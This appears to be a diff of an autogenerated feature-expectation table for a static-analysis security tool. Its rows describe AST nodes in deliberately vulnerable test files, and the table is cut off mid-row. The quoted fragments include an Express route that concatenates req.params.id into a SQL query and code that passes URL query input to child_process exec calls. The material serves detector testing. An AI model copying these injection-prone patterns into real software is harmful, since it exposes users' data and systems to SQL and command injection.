req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | return of anonymous function | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:31:9:33 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:31:9:33 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:31:9:33 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:31:9:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:31:9:33 | req | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:31:9:33 | req | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:31:9:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:31:9:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:31:9:33 | req | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:31:9:33 | req | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:36:9:38 | res | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:36:9:38 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:36:9:38 | res | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:36:9:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:36:9:38 | res | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:4 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:4 | db | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:4 | db | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:4 | db | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:8 | db.get | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:8 | db.get | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:8 | db.get | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:8 | db.get | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:8 | db.get | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:65 | db.get( ... + '"') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:65 | db.get( ... + '"') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:65 | db.get( ... + '"') | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:65 | db.get( ... + '"') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:65 | db.get( ... + '"') | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:65 | exceptional return of db.get( ... + '"') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:65 | exceptional return of db.get( ... + '"') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:65 | exceptional return of db.get( ... + '"') | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:65 | exceptional return of db.get( ... + '"') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:65 | exceptional return of db.get( ... + '"') | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:6:10:8 | get | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:6:10:8 | get | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:6:10:8 | get | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:6:10:8 | get | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:6:10:8 | get | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:10:10:42 | 'SELECT ... id = "' | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:10:10:42 | 'SELECT ... id = "' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:10:10:42 | 'SELECT ... id = "' | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:10:10:42 | 'SELECT ... id = "' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:10:10:42 | 'SELECT ... id = "' | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:10:10:42 | 'SELECT ... id = "' | stringConcatenatedWith | -endpoint- req.params.id + '"' | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:10:10:58 | 'SELECT ... rams.id | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:10:10:58 | 'SELECT ... rams.id | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:10:10:58 | 'SELECT ... rams.id | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | @@ -4590,12 +22106,35779 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:10:10:64 | 'SELECT ... d + '"' | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:10:10:64 | 'SELECT ... d + '"' | fileImports | express sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:10:10:64 | 'SELECT ... d + '"' | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:46:10:48 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:46:10:48 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:46:10:48 | req | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:46:10:48 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:46:10:48 | req | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:46:10:55 | req.params | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:46:10:55 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:46:10:55 | req.params | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:46:10:55 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:46:10:55 | req.params | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:46:10:58 | req.params.id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:46:10:58 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:46:10:58 | req.params.id | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:46:10:58 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:46:10:58 | req.params.id | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:46:10:58 | req.params.id | stringConcatenatedWith | 'SELECT * FROM Post WHERE id = "' -endpoint- '"' | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:50:10:55 | params | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:50:10:55 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:50:10:55 | params | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:50:10:55 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:50:10:55 | params | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:57:10:58 | id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:57:10:58 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:57:10:58 | id | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:57:10:58 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:57:10:58 | id | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:62:10:64 | '"' | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:62:10:64 | '"' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:62:10:64 | '"' | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:62:10:64 | '"' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:62:10:64 | '"' | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:62:10:64 | '"' | stringConcatenatedWith | 'SELECT * FROM Post WHERE id = "' + req.params.id -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:0 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:0 | this | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:0 | this | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:1 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:1 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:1 | require | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:1 | require | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:1 | run | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:1 | run | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:1 | run | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:1 | url | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:1 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:1 | url | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:1 | util | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:1 | util | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:1:1:1 | util | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:5:1:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:5:1:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:5:1:33 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:5:1:33 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:5:1:33 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:5:1:33 | cp = re ... ocess") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:5:1:33 | cp = re ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:5:1:33 | cp = re ... ocess") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:10:1:16 | require | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:10:1:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:10:1:16 | require | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:10:1:33 | exceptional return of require ... ocess") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:10:1:33 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:10:1:33 | exceptional return of require ... ocess") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:10:1:33 | require ... ocess") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:10:1:33 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:10:1:33 | require ... ocess") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:18:1:32 | "child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:18:1:32 | "child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:18:1:32 | "child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:18:1:32 | "child_process" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:18:1:32 | "child_process" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:18:1:32 | "child_process" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:5:2:8 | http | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:5:2:8 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:5:2:8 | http | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:5:2:26 | http | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:5:2:26 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:5:2:26 | http | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:5:2:26 | http = ... 'http') | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:5:2:26 | http = ... 'http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:5:2:26 | http = ... 'http') | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:12:2:18 | require | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:12:2:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:12:2:18 | require | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:12:2:26 | exceptional return of require('http') | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:12:2:26 | exceptional return of require('http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:12:2:26 | exceptional return of require('http') | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:12:2:26 | require('http') | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:12:2:26 | require('http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:12:2:26 | require('http') | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:20:2:25 | 'http' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:20:2:25 | 'http' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:20:2:25 | 'http' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:20:2:25 | 'http' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:20:2:25 | 'http' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:20:2:25 | 'http' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:5:3:7 | url | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:5:3:7 | url | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:5:3:24 | url | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:5:3:24 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:5:3:24 | url | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:5:3:24 | url = require('url') | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:5:3:24 | url = require('url') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:5:3:24 | url = require('url') | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:11:3:17 | require | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:11:3:17 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:11:3:17 | require | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:11:3:24 | exceptional return of require('url') | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:11:3:24 | exceptional return of require('url') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:11:3:24 | exceptional return of require('url') | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:11:3:24 | require('url') | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:11:3:24 | require('url') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:11:3:24 | require('url') | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:19:3:23 | 'url' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:19:3:23 | 'url' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:19:3:23 | 'url' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:19:3:23 | 'url' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:19:3:23 | 'url' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:19:3:23 | 'url' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:5:5:10 | server | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:5:5:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:5:5:10 | server | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:5:64:2 | server ... Y] \\n\\n}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:5:64:2 | server ... Y] \\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:5:64:2 | server ... Y] \\n\\n}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:14:5:17 | http | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:14:5:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:14:5:17 | http | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:14:5:30 | http.createServer | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:14:5:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:14:5:30 | http.createServer | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:14:64:2 | exceptional return of http.cr ... Y] \\n\\n}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:14:64:2 | exceptional return of http.cr ... Y] \\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:14:64:2 | exceptional return of http.cr ... Y] \\n\\n}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:14:64:2 | http.cr ... Y] \\n\\n}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:14:64:2 | http.cr ... Y] \\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:14:64:2 | http.cr ... Y] \\n\\n}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:19:5:30 | createServer | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:19:5:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:19:5:30 | createServer | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp 